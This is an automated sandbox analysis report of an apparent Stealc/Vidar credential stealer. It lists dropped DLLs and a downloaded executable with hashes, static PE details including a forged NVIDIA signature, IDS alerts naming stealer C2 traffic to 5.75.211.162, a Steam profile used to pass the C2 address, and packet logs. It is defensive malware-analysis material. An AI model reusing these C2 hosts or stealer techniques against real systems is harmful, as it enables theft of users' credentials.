                                                                                                      SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                      C:\ProgramData\nss3.dll

                                                                                                      Download File
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2046288
                                                                                                      Entropy (8bit):6.787733948558952
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                      MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                      SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                      SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                      SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\ProgramData\softokn3.dll

                                                                                                      Download File
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):257872
                                                                                                      Entropy (8bit):6.727482641240852
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                      MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                      SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                      SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                      SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\ProgramData\vcruntime140.dll

                                                                                                      Download File
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):80880
                                                                                                      Entropy (8bit):6.920480786566406
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                      MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                      SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                      SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                      SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                      File Type:CSV text
                                                                                                      Category:modified
                                                                                                      Size (bytes):425
                                                                                                      Entropy (8bit):5.353683843266035
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                                      MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                                      SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                                      SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                                                      SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                                      Malicious:false
                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\ljhgfsd[1].exe

                                                                                                      Download File
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Category:modified
                                                                                                      Size (bytes):263908
                                                                                                      Entropy (8bit):7.998846488868232
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:3072:CEJhujqDU1ByHguzD/FN56N4UV9qMuoTfXzksKk+3AwMQmBbsvsuikkAlrweSdvG:CQuuGQX/FN5CVU03+wwybsDV3SdO
                                                                                                      MD5:21504B52DAA4C04B619A19E6EDC54CD1
                                                                                                      SHA1:5F4F51F69B964DE390ADB06822D25164B6B77958
                                                                                                      SHA-256:5F701B9AAD60C098DC1D36FC83C660D67FFF172A4DEDB3DE351506FA435B152D
                                                                                                      SHA-512:52A55DAEA6755C80A1AD0855E1F65179AC58DCD7739EC3B49079C90312548FF9169024B82B5AA6D2DCD82F1644955DBC22D4BDD874396EDA92D3D8AF01D8544F
                                                                                                      Malicious:false
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f............................>.... ........@.. ....................... ............`.....................................S.......................(&........................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H...........0............................................................M.b.K..K.9~h.w....G).2..X..u.........&...W...`.r..I.z-@..W....y...x..e...g.O....f.&..~.vV.\...yM<..V&..z..B.).....y..-....g.*E..!T9.z...M..."...A...#..V..kj#.2....)........:r...-9\..hK<....f3u.xX....T.....+Q:.......T....X.i.v7.....Q.9vq. .M.r0..}k.t5J!..1.e..U..;....;..z.9_Y.T3?k%..L.6M....;.P.5W.'0....V.T,9wl..y....]....sj:y..k.4.$.".o.9.V+.@Re3Y..(...:.K.O#..L..X%.u..`&.1&..X{.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\76561199780418869[1].htm

                                                                                                      Download File
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):34725
                                                                                                      Entropy (8bit):5.398191594193763
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:udpqme0Ih3tAA6WGA2fcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2Sw:ud8me0Ih3tAA6WGA2FhTBv++nIjBtPFx
                                                                                                      MD5:FFA0C2C2653004A67F8A1678D828B8E6
                                                                                                      SHA1:AC6B9B479F89228E7897D2D44C598049DD06618C
                                                                                                      SHA-256:413C48F24563569AFFF0CD7592D4F4A96D35DEBAFA0821CE552D7AB09C56F42D
                                                                                                      SHA-512:8E58AB3A95E64339C04170483EF13A75FA8826E02A6D72AEBE862CF3B013C42E6755DE8EB385C5F5AB03320461C4F3DBEB943613B1755B9CD513E6F6E35FBE3A
                                                                                                      Malicious:false
                                                                                                      Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://5.75.211.162|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link href

                                                                                                      C:\Users\user\AppData\Local\Temp\delays.tmp

                                                                                                      Download File
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:ISO-8859 text, with very long lines (65536), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1048575
                                                                                                      Entropy (8bit):0.0
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:jhm:jQ
                                                                                                      MD5:80837145C2275170B37B751DDB80D102
                                                                                                      SHA1:F200F89D9A518CE937581F50D3DCCF584AE5F897
                                                                                                      SHA-256:591556B0A920AA3299E7AB5963E263F4B2F7A1DE7DBA2BF83579A878F2E306D0
                                                                                                      SHA-512:65AD041FFC6603C59A30254CC3726EE0AA1FF391C311C408A497BE42E86201A63049BC436CEB496EA60A40818653DA6A55CBE20D651C4FB29CF4C21E87C9CDE8
                                                                                                      Malicious:false
                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      \Device\ConDrv

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                      File Type:ASCII text, with CRLF, LF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):33
                                                                                                      Entropy (8bit):2.2845972159140855
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:i6vvRyMivvRya:iKvHivD
                                                                                                      MD5:45B4C82B8041BF0F9CCED0D6A18D151A
                                                                                                      SHA1:B4DAD3FFFEF507CBB78671EE620BB495F8CE22F1
                                                                                                      SHA-256:7CFA461ED1FC8611AB74878EDB1FBBDE3596F5D042946A42A7F31EB6D462E628
                                                                                                      SHA-512:B29C3696A8A311EFAF9B9709BA082FF2C8D45A6912D79BC1DE7FEEFBEF8F8DDEFCD6650B5E1165D0A79800C8AED399E2B11BC2431E3837DD8587516BDE50EAB5
                                                                                                      Malicious:false
                                                                                                      Preview:0..1..2..3..4..0..1..2..3..4.....

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Entropy (8bit):7.988867781346718
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:file.exe
                                                                                                      File size:413'224 bytes
                                                                                                      MD5:2cce29d734ea1d227b338834698e2de4
                                                                                                      SHA1:41700cd1bcf5f5bcca81ce722ed47fc17bd030c2
                                                                                                      SHA256:f75acf936390f89239c43552717efb65c4c3190b16a7eec62dcd0053a045e91d
                                                                                                      SHA512:ea0b440113a225764b38ae2526a10f7e4f3081e4a353e9831cf0e846ac7ba97ea7c2b4a12ab6fac5708a7855da8967f1b6bc661757dc68d819d11887a6af20b5
                                                                                                      SSDEEP:6144:O+0dGgr04h1LBuTmcYz43wUDPNvms5PYYzX3oYbEU6DsV4+1/QSyiZEO:30d/h1LBK13wUjx5QYTo0EUBVSS/EO
                                                                                                      TLSH:1E9423E704F10716CEE9323C54D26F3E8AF2D194912319FB82E756B69D7234A226C7C5
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................><... ...@....@.. ....................................`................................

                                                                                                      File Icon

                                                                                                      Icon Hash:00928e8e8686b000

                                                                                                      Static PE Info

                                                                                                      General

                                                                                                      Entrypoint:0x463c3e
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:true
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows cui
                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x66F591C2 [Thu Sep 26 16:54:26 2024 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:4
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:4
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:4
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                      Authenticode Signature

                                                                                                      Signature Valid:false
                                                                                                      Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                                                      Error Number:-2146869232
                                                                                                      Not Before, Not After
                                                                                                      • 13/01/2023 01:00:00 17/01/2026 00:59:59
                                                                                                      Subject Chain
                                                                                                      • CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
                                                                                                      Version:3
                                                                                                      Thumbprint MD5:5F1B6B6C408DB2B4D60BAA489E9A0E5A
                                                                                                      Thumbprint SHA-1:15F760D82C79D22446CC7D4806540BF632B1E104
                                                                                                      Thumbprint SHA-256:28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
                                                                                                      Serial:0997C56CAA59055394D9A9CDB8BEEB56

                                                                                                      Entrypoint Preview

                                                                                                      Instruction
                                                                                                      jmp dword ptr [00402000h]
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al

                                                                                                      Data Directories

                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x63be80x53.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000x5c8.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x628000x2628
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x660000xc.reloc
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x63ab00x1c.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                      Sections

                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x20000x61c440x61e0032747b246885c515d2a5dcbda6206f48False0.9938088681353767data7.99542204298472IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                      .rsrc0x640000x5c80x600db1daa9db276719b7dce2f7fee59adb7False0.4361979166666667data4.115782972549961IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .reloc0x660000xc0x200668ddc03321cdfb17f8be719cbc539e8False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                      Resources

                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                      RT_VERSION0x640a00x334data0.4426829268292683
                                                                                                      RT_MANIFEST0x643d80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                                                      Imports

                                                                                                      DLLImport
                                                                                                      mscoree.dll_CorExeMain

                                                                                                      Network Behavior

                                                                                                      Suricata IDS Alerts

                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                      2024-09-26T19:05:29.150702+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.5497165.75.211.162443TCP
                                                                                                      2024-09-26T19:05:30.312845+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.5497175.75.211.162443TCP
                                                                                                      2024-09-26T19:05:31.702222+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.5497185.75.211.162443TCP
                                                                                                      2024-09-26T19:05:33.104487+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.5497195.75.211.162443TCP
                                                                                                      2024-09-26T19:05:33.812539+02002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config15.75.211.162443192.168.2.549719TCP
                                                                                                      2024-09-26T19:05:34.982172+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.5497205.75.211.162443TCP
                                                                                                      2024-09-26T19:05:35.679915+02002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST1192.168.2.5497205.75.211.162443TCP
                                                                                                      2024-09-26T19:05:35.680099+02002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M115.75.211.162443192.168.2.549720TCP
                                                                                                      2024-09-26T19:05:36.445705+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.5497215.75.211.162443TCP
                                                                                                      2024-09-26T19:05:37.445668+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.5497225.75.211.162443TCP
                                                                                                      2024-09-26T19:05:40.833080+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.5497235.75.211.162443TCP
                                                                                                      2024-09-26T19:05:41.609248+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.5497245.75.211.162443TCP
                                                                                                      2024-09-26T19:05:42.783781+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.5497255.75.211.162443TCP
                                                                                                      2024-09-26T19:05:43.973906+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.5497265.75.211.162443TCP
                                                                                                      2024-09-26T19:05:45.731071+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.5497275.75.211.162443TCP
                                                                                                      2024-09-26T19:05:47.499648+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.5497285.75.211.162443TCP
                                                                                                      2024-09-26T19:05:49.080817+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.5497295.75.211.162443TCP
                                                                                                      2024-09-26T19:05:50.522089+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.5497305.75.211.162443TCP
                                                                                                      2024-09-26T19:05:51.810151+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.5497315.75.211.162443TCP
                                                                                                      2024-09-26T19:05:54.892995+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.5497325.75.211.162443TCP
                                                                                                      2024-09-26T19:05:56.180974+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.5497335.75.211.162443TCP
                                                                                                      2024-09-26T19:05:57.843408+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.5497345.75.211.162443TCP
                                                                                                      2024-09-26T19:05:59.292302+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.5497355.75.211.162443TCP
                                                                                                      2024-09-26T19:06:01.413460+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.5497365.75.211.162443TCP
                                                                                                      2024-09-26T19:06:03.295823+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.5497385.75.211.162443TCP
                                                                                                      2024-09-26T19:06:06.929545+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549739172.105.54.160443TCP

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Sep 26, 2024 19:05:25.650388956 CEST49715443192.168.2.5104.102.49.254
                                                                                                      Sep 26, 2024 19:05:25.650432110 CEST44349715104.102.49.254192.168.2.5
                                                                                                      Sep 26, 2024 19:05:25.650510073 CEST49715443192.168.2.5104.102.49.254
                                                                                                      Sep 26, 2024 19:05:25.667674065 CEST49715443192.168.2.5104.102.49.254
                                                                                                      Sep 26, 2024 19:05:25.667706013 CEST44349715104.102.49.254192.168.2.5
                                                                                                      Sep 26, 2024 19:05:26.308278084 CEST44349715104.102.49.254192.168.2.5
                                                                                                      Sep 26, 2024 19:05:26.308345079 CEST49715443192.168.2.5104.102.49.254
                                                                                                      Sep 26, 2024 19:05:26.369884968 CEST49715443192.168.2.5104.102.49.254
                                                                                                      Sep 26, 2024 19:05:26.369904995 CEST44349715104.102.49.254192.168.2.5
                                                                                                      Sep 26, 2024 19:05:26.370244026 CEST44349715104.102.49.254192.168.2.5
                                                                                                      Sep 26, 2024 19:05:26.370310068 CEST49715443192.168.2.5104.102.49.254
                                                                                                      Sep 26, 2024 19:05:26.372486115 CEST49715443192.168.2.5104.102.49.254
                                                                                                      Sep 26, 2024 19:05:26.415410042 CEST44349715104.102.49.254192.168.2.5
                                                                                                      Sep 26, 2024 19:05:27.076687098 CEST44349715104.102.49.254192.168.2.5
                                                                                                      Sep 26, 2024 19:05:27.076742887 CEST44349715104.102.49.254192.168.2.5
                                                                                                      Sep 26, 2024 19:05:27.076770067 CEST49715443192.168.2.5104.102.49.254
                                                                                                      Sep 26, 2024 19:05:27.076786041 CEST44349715104.102.49.254192.168.2.5
                                                                                                      Sep 26, 2024 19:05:27.076816082 CEST49715443192.168.2.5104.102.49.254
                                                                                                      Sep 26, 2024 19:05:27.076831102 CEST44349715104.102.49.254192.168.2.5
                                                                                                      Sep 26, 2024 19:05:27.076841116 CEST49715443192.168.2.5104.102.49.254
                                                                                                      Sep 26, 2024 19:05:27.076872110 CEST49715443192.168.2.5104.102.49.254
                                                                                                      Sep 26, 2024 19:05:27.178963900 CEST44349715104.102.49.254192.168.2.5
                                                                                                      Sep 26, 2024 19:05:27.179027081 CEST44349715104.102.49.254192.168.2.5
                                                                                                      Sep 26, 2024 19:05:27.179083109 CEST49715443192.168.2.5104.102.49.254
                                                                                                      Sep 26, 2024 19:05:27.179110050 CEST44349715104.102.49.254192.168.2.5
                                                                                                      Sep 26, 2024 19:05:27.179131031 CEST49715443192.168.2.5104.102.49.254
                                                                                                      Sep 26, 2024 19:05:27.179145098 CEST49715443192.168.2.5104.102.49.254
                                                                                                      Sep 26, 2024 19:05:27.184391022 CEST44349715104.102.49.254192.168.2.5
                                                                                                      Sep 26, 2024 19:05:27.184479952 CEST49715443192.168.2.5104.102.49.254
                                                                                                      Sep 26, 2024 19:05:27.184499025 CEST44349715104.102.49.254192.168.2.5
